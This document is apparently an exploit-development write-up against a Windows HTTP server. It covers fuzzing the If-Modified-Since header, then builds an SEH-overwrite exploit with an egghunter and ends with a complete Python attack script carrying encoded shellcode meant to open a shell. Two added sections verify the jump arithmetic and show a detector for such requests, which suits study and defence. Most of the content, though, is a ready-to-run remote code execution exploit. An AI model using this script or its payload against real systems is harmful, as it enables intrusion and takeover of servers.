Fuzzing
GET HTTP request (the captured browser request, saved as get.txt):

```
GET / HTTP/1.1
Host: 192.168.1.9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMT
Cache-Control: max-age=0
```
Create a fuzzing script with boo-gen from the captured HTTP request:

```
python boo-gen.py get.txt
```
Vulnerable header: If-Modified-Since: Wed, <fuzzing-payload>

The generated boofuzz primitives for that header (only the date value is fuzzable):

```python
s_string("If-Modified-Since: Sat,", name="If-Modified-Since", fuzzable=False)
s_delim(" ", name="space-10", fuzzable=False)
s_string("15 Jun 2019 01:36:09 GMT", name="If-Modified-Since-Value")
```
Offset
```python
#!/usr/bin/python
# Python 2: the request is a plain str and is sent as raw bytes
import socket, sys, os

ip = "192.168.1.9"
port = 80

offset = "A"*350
nseh = ""   # nSEH/SEH are filled in once the offset is known; empty for the crash run
seh = ""
buffer = offset + nseh + seh

request = ""
request += "GET / HTTP/1.1\r\n"
request += "Host: 192.168.1.9\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.5\r\n"
request += "Accept-Encoding: gzip, deflate\r\n"
request += "Connection: close\r\n"
request += "Upgrade-Insecure-Requests: 1\r\n"
request += "If-Modified-Since: Thu, " + buffer + "\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(request)
s.close()
```
SEH overwrite
POP-POP-RET
!mona seh
The address starts with a null byte. If we only send the 44F584 part of 0044F584, the D characters we add after SEH will turn it into 4444F584.
If we remove the D characters, the correct address is found.
Remember the normal SEH structure for the exploit:

[Junk][nSEH][SEH][Nop-Shellcode]

nSEH = the jump to the shellcode
SEH = a reference to a pop pop ret

Steps: find offset, find pop-pop-ret, short jump with nSEH, create shellcode.

```python
offset = "A"*304
nseh = "\xcc\xcc\xcc\xcc"
seh = "\x57\xf8\x44"  # pop-pop-ret 0x0044f857
nops = "\x90"*24
shellcode = ""
```
But we don't have much space after SEH, so we'll jump backwards.
A 50-byte jump back = \xeb\xcc
Calculations:
JMP 50 bytes back
We need exact numbers here, because there is some corruption at the start of the A buffer.

Start of A buffer = 6FE80
"A" buffer start after the corruption = 6FEE0
Address at the end of the As = 6FF7E

So there is enough space, more than 50 bytes.
Let's JMP 50 back: after \xeb\xcc executes, the new address is 0x6FF7E.

The calculation for the space before the egghunter:
Start of A buffer = 6fe80
New address after JMP 50 back = 6ff7e
0x6ff7e - 0x6fe80 = 0xfe = 254 bytes of padding before the egghunter.
So the offset will be as follows:

```python
offset = "A"*254 + egghunter + "A"*(304-254-32)
```
Before the JMP 50 backwards, with our calculations in place:
After the JMP 50 backwards the address becomes 6ff7e, which is the start address of the egghunter, as can be seen in the memory dump.
We're all set. Let's create the shellcode and get a shell.
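The jump-back arithmetic above, worked through as an added example (not code from the original write-up): it encodes the short jmp, computes where it lands from the addresses quoted in the post, derives the 254 / 18 padding split, and shows why the null-prefixed SEH address 0x0044F584 becomes 4444F584 when a D follows it. The constants are the post's own values.

```python
import struct

# Values quoted in the write-up (stack addresses seen in the debugger).
A_BUF_START = 0x6FE80   # start of the "A" buffer
JUNK_TO_NSEH = 304      # bytes of "A" before nSEH
EGGHUNTER_LEN = 32      # the 32-byte egghunter used above
JUMP_BACK = 50          # nSEH jumps 50 bytes backwards

def short_jmp_back(n):
    """Encode 'jmp short -n' (EB rel8). rel8 is taken from the address of the
    NEXT instruction, so landing n bytes before the jmp itself needs -(n + 2)."""
    rel = -(n + 2)
    if not -128 <= rel <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", rel)

def jmp_target(jmp_addr, encoded):
    """Address that a 2-byte short jmp located at jmp_addr lands on."""
    rel = struct.unpack("<b", encoded[1:2])[0]
    return jmp_addr + 2 + rel

def layout(a_start=A_BUF_START, junk=JUNK_TO_NSEH, back=JUMP_BACK, hunter_len=EGGHUNTER_LEN):
    """Reproduce the 'A'*254 + egghunter + 'A'*(304-254-32) split and check
    that the egghunter really fits between the landing point and nSEH."""
    nseh_addr = a_start + junk
    enc = short_jmp_back(back)
    land = jmp_target(nseh_addr, enc)
    before = land - a_start             # padding before the egghunter
    after = junk - before - hunter_len  # padding between egghunter and nSEH
    if after < 0:
        raise ValueError("egghunter would overlap nSEH")
    return {"nseh_addr": nseh_addr, "jmp": enc, "land": land,
            "before": before, "after": after}

def effective_seh(addr, trailing):
    """The SEH address 0x0044F584 starts with a null byte, so only its low three
    bytes can be sent; the fourth byte is whatever follows in the request.
    Returns the handler address the program will actually use."""
    three = struct.pack("<I", addr)[:3]
    return struct.unpack("<I", three + trailing[:1])[0]

if __name__ == "__main__":
    lay = layout()
    print("nSEH at 0x%X, jmp %s lands at 0x%X" % (lay["nseh_addr"], lay["jmp"].hex(), lay["land"]))
    print("offset = 'A'*%d + egghunter + 'A'*%d" % (lay["before"], lay["after"]))
    print("SEH 0x0044F584 followed by 'D' -> 0x%08X" % effective_seh(0x0044F584, b"D"))
```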
Final Exploit and Shell
```python
#!/usr/bin/python
# Python 2: the request is a plain str and is sent as raw bytes
import socket, sys, os

ip = "192.168.1.9"
port = 80

# 32-byte egghunter looking for the "kali" tag
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x6b\x61\x6c\x69\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"

#offset = "A"* 254 + egghunter + "A"*(304-254-32)
offset = "A"*254 + egghunter + "A"*(304-254-32)
nseh = "\xeb\xcc\x90\x90"   # jmp short 50 bytes back, landing on the egghunter
seh = "\x57\xf8\x44"        # pop-pop-ret 0x0044f857

egg = "kalikali"
shellcode = ""
shellcode += "\x89\xe3\xdb\xc9\xd9\x73\xf4\x58\x50\x59\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
shellcode += "\x39\x6c\x79\x78\x6d\x52\x45\x50\x73\x30\x77\x70"
shellcode += "\x43\x50\x6d\x59\x6d\x35\x30\x31\x6b\x70\x31\x74"
shellcode += "\x6e\x6b\x62\x70\x36\x50\x6c\x4b\x76\x32\x54\x4c"
shellcode += "\x6c\x4b\x73\x62\x46\x74\x6c\x4b\x70\x72\x74\x68"
shellcode += "\x56\x6f\x38\x37\x61\x5a\x67\x56\x35\x61\x59\x6f"
shellcode += "\x4c\x6c\x37\x4c\x75\x31\x61\x6c\x36\x62\x44\x6c"
shellcode += "\x65\x70\x6b\x71\x4a\x6f\x54\x4d\x36\x61\x5a\x67"
shellcode += "\x39\x72\x6a\x52\x33\x62\x70\x57\x6e\x6b\x62\x72"
shellcode += "\x52\x30\x6e\x6b\x73\x7a\x35\x6c\x6c\x4b\x32\x6c"
shellcode += "\x47\x61\x34\x38\x5a\x43\x52\x68\x55\x51\x48\x51"
shellcode += "\x66\x31\x4c\x4b\x50\x59\x77\x50\x37\x71\x68\x53"
shellcode += "\x4e\x6b\x70\x49\x52\x38\x39\x73\x36\x5a\x63\x79"
shellcode += "\x4c\x4b\x45\x64\x6e\x6b\x57\x71\x4a\x76\x74\x71"
shellcode += "\x79\x6f\x6e\x4c\x59\x51\x7a\x6f\x76\x6d\x56\x61"
shellcode += "\x4a\x67\x57\x48\x4b\x50\x34\x35\x7a\x56\x44\x43"
shellcode += "\x31\x6d\x6a\x58\x45\x6b\x71\x6d\x67\x54\x43\x45"
shellcode += "\x48\x64\x71\x48\x4e\x6b\x52\x78\x67\x54\x43\x31"
shellcode += "\x58\x53\x33\x56\x6c\x4b\x44\x4c\x32\x6b\x4c\x4b"
shellcode += "\x36\x38\x35\x4c\x73\x31\x58\x53\x4e\x6b\x55\x54"
shellcode += "\x6c\x4b\x45\x51\x7a\x70\x4e\x69\x62\x64\x54\x64"
shellcode += "\x64\x64\x63\x6b\x53\x6b\x75\x31\x33\x69\x73\x6a"
shellcode += "\x33\x61\x69\x6f\x59\x70\x61\x4f\x61\x4f\x72\x7a"
shellcode += "\x6c\x4b\x54\x52\x48\x6b\x4c\x4d\x53\x6d\x52\x48"
shellcode += "\x45\x63\x37\x42\x65\x50\x35\x50\x65\x38\x50\x77"
shellcode += "\x44\x33\x50\x32\x31\x4f\x46\x34\x43\x58\x30\x4c"
shellcode += "\x31\x67\x61\x36\x36\x67\x6b\x4f\x4e\x35\x4e\x58"
shellcode += "\x6c\x50\x67\x71\x55\x50\x65\x50\x36\x49\x49\x54"
shellcode += "\x62\x74\x36\x30\x35\x38\x67\x59\x6b\x30\x52\x4b"
shellcode += "\x73\x30\x79\x6f\x6a\x75\x66\x30\x36\x30\x36\x30"
shellcode += "\x76\x30\x63\x70\x66\x30\x37\x30\x52\x70\x55\x38"
shellcode += "\x49\x7a\x36\x6f\x39\x4f\x69\x70\x69\x6f\x4e\x35"
shellcode += "\x4c\x57\x32\x4a\x66\x65\x50\x68\x59\x50\x4f\x58"
shellcode += "\x65\x51\x57\x78\x63\x58\x47\x72\x77\x70\x71\x32"
shellcode += "\x6c\x78\x6c\x49\x4d\x36\x51\x7a\x76\x70\x62\x76"
shellcode += "\x70\x57\x70\x68\x6d\x49\x79\x35\x72\x54\x50\x61"
shellcode += "\x39\x6f\x58\x55\x6c\x45\x59\x50\x42\x54\x64\x4c"
shellcode += "\x79\x6f\x42\x6e\x44\x48\x72\x55\x78\x6c\x70\x68"
shellcode += "\x6c\x30\x6e\x55\x4e\x42\x76\x36\x69\x6f\x78\x55"
shellcode += "\x62\x48\x63\x53\x32\x4d\x45\x34\x47\x70\x4d\x59"
shellcode += "\x38\x63\x73\x67\x42\x77\x72\x77\x64\x71\x6b\x46"
shellcode += "\x30\x6a\x37\x62\x36\x39\x50\x56\x6a\x42\x39\x6d"
shellcode += "\x71\x76\x5a\x67\x53\x74\x37\x54\x67\x4c\x77\x71"
shellcode += "\x73\x31\x6c\x4d\x62\x64\x54\x64\x76\x70\x6b\x76"
shellcode += "\x63\x30\x61\x54\x36\x34\x52\x70\x31\x46\x70\x56"
shellcode += "\x63\x66\x72\x66\x43\x66\x50\x4e\x32\x76\x66\x36"
shellcode += "\x66\x33\x36\x36\x65\x38\x34\x39\x48\x4c\x35\x6f"
shellcode += "\x6e\x66\x4b\x4f\x7a\x75\x6d\x59\x6d\x30\x62\x6e"
shellcode += "\x61\x46\x42\x66\x69\x6f\x76\x50\x63\x58\x56\x68"
shellcode += "\x4f\x77\x37\x6d\x75\x30\x49\x6f\x4b\x65\x6f\x4b"
shellcode += "\x58\x70\x6c\x75\x4d\x72\x76\x36\x72\x48\x39\x36"
shellcode += "\x6a\x35\x4f\x4d\x4d\x4d\x6b\x4f\x4b\x65\x37\x4c"
shellcode += "\x44\x46\x61\x6c\x34\x4a\x6d\x50\x4b\x4b\x49\x70"
shellcode += "\x64\x35\x34\x45\x6f\x4b\x31\x57\x46\x73\x51\x62"
shellcode += "\x72\x4f\x52\x4a\x57\x70\x71\x43\x59\x6f\x4b\x65"
shellcode += "\x41\x41"

stage1 = offset + nseh + seh   # goes into If-Modified-Since: overflow + SEH overwrite
stage2 = egg + shellcode       # goes into Host: the egg the hunter searches for

request = ""
request += "GET / HTTP/1.1\r\n"
request += "Host: 192.168.1.9" + stage2 + "\r\n"
request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.5\r\n"
request += "Accept-Encoding: gzip, deflate\r\n"
request += "Connection: close\r\n"
request += "Upgrade-Insecure-Requests: 1\r\n"
request += "If-Modified-Since: Thu, " + stage1 + "\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(request)
s.close()
```
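From the defender's side, the request above has a distinctive shape: an If-Modified-Since value that is hundreds of bytes long, is not an HTTP-date, and carries non-printable bytes, plus a Host value with binary data after the address. This added example (not part of the original write-up) parses a raw request and flags those three properties; the 256-byte threshold and both sample requests are constructed for the demonstration.

```python
import re

MAX_HEADER_VALUE = 256   # assumed threshold; tune for the server being protected
# RFC 1123 HTTP-date as used by If-Modified-Since, e.g. "Thu, 22 Jul 2004 13:42:56 GMT"
HTTP_DATE = re.compile(rb"^(Mon|Tue|Wed|Thu|Fri|Sat|Sun), \d{2} [A-Z][a-z]{2} \d{4} "
                       rb"\d{2}:\d{2}:\d{2} GMT$")

def parse_headers(raw):
    """Split a raw request into (request_line, [(name, value), ...]).
    Header names are lower-cased; only the header block is parsed."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers

def check_request(raw):
    """Return a list of (header, reason) findings; an empty list means
    nothing about the header block looked like the overflow request."""
    findings = []
    _, headers = parse_headers(raw)
    for name, value in headers:
        if len(value) > MAX_HEADER_VALUE:
            findings.append((name, "value longer than %d bytes" % MAX_HEADER_VALUE))
        if any(b < 0x20 or b > 0x7e for b in value):
            findings.append((name, "non-printable bytes in value"))
        if name == b"if-modified-since" and not HTTP_DATE.match(value):
            findings.append((name, "not an RFC 1123 HTTP-date"))
    return findings

# Constructed samples: a normal browser request and one shaped like the exploit
# (egg plus a few shellcode bytes in Host, 304 As plus nSEH/SEH in If-Modified-Since).
BENIGN = (b"GET / HTTP/1.1\r\n"
          b"Host: 192.168.1.9\r\n"
          b"If-Modified-Since: Thu, 22 Jul 2004 13:42:56 GMT\r\n\r\n")
SUSPECT = (b"GET / HTTP/1.1\r\n"
           + b"Host: 192.168.1.9" + b"kalikali" + b"\x89\xe3\xdb\xc9" + b"\r\n"
           + b"If-Modified-Since: Thu, " + b"A" * 304 + b"\xeb\xcc\x90\x90\x57\xf8\x44"
           + b"\r\n\r\n")

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(label, check_request(sample))
```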